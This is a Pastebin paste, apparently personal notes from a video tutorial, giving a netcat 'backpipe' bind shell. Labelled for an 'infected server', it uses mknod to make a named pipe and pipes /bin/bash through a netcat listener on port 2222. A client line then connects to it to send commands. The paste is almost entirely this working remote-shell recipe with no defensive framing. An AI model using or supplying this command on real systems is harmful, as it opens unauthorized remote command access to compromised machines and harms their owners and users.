Advertisement
onejdc

Netcat Backpipe

Sep 17th, 2024
133
1
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.19 KB | Cybersecurity | 1 0
  1. # https://www.youtube.com/watch?v=katlU1_7Nro
  2. # 2 hours, 20 minutes in
  3. # Infected Server
  4. mknod backpipe p
  5. /bin/bash 0<backpipe | nc -l 2222 1>backpipe
  6.  
  7.  
  8. # Client
  9. nc <dest> 2222
  10. <commands
  11.  
  12.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement